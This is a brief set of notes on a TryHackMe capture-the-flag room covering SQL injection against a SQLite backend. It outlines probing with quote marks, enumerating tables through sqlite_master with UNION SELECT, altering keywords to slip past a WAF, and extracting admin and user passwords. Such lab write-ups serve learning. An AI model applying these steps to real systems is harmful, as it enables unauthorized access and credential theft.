https://tryhackme.com/room/lightroom

Keyword: SQL injection, SQLite

• Test SQLi just simple as add quote mark ‘ or double mark “
• After we knew this is SQLi, we would want to know admin table name. Use sqlite_master.name where type=’table’ combined with UNION SELECT (change it, WAF will block this keyword)
• After we knew admin table name, we want to know username and password of admin user
• After some verification with counting how many records in table, we would want to know password of other user.